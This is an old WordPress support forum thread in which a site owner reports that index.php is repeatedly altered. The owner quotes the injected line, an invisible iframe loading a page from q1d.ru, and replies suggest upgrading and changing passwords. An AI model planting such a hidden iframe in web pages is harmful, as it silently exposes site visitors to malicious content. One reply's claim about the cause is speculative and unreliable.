Getting hacked last two days.. (6 posts)

  1. cyberhrc
    Posted 7 years ago #

    As the topic says...
    Something fishy is up on my page
    index.php is getting changed with following line:

    /** Loads the WordPress Environment and Template */
    <iframe src="http://q1d.ru:8080/index.php" width=134 height=145 style="visibility: hidden"></iframe>

    getting only blank page.. overwriting with default index.php solves the trouble but still e very 24 hours i get same problem

    wordpress is 2.8.1, no fancy plugins except nextgen + akismet + ajax poll
    directories chmoded properly, have this page for the last 2 years on wordpress and no trouble so far..

    rest of stats:

    OS Linux Database Data Disk Usage 218.5 MiB
    Server Apache Database Index Disk Usage 34.5 MiB
    PHP v4.4.9 MYSQL Maximum Packet Size 8.0 MiB
    MYSQL v4.1.11-Debian_4sarge7-log MYSQL Maximum No. Connection 300

    any1 got some idea? mby my host is crap ?

  2. Ashleybigheart
    Posted 7 years ago #

  3. cyberhrc
    Posted 7 years ago #

    ty gonna check ;)

  4. Shane G
    Posted 7 years ago #


    When you try to upgrade/install/uninstall your blog through third party script like fantastico that may add the code of iframe in your blog which wil count as spam/hack code by google so take care of it..

    -> Also check with this options:

    - Upgrade wordpress to the latest version
    - install only the script which are compatible with your blog version
    - do not install any third party/vulnerable script
    - reset all the passwords are regular intervals


    Shane G.

  5. cyberhrc
    Posted 7 years ago #

    i dont use fantastico, i never liked it :)
    upgraded on 2.8.2 so lets hope that all will be ok :X

  6. gariben
    Posted 7 years ago #

    You should also changed the FTP password along with MySQL password

Topic Closed

This topic has been closed to new replies.

About this Topic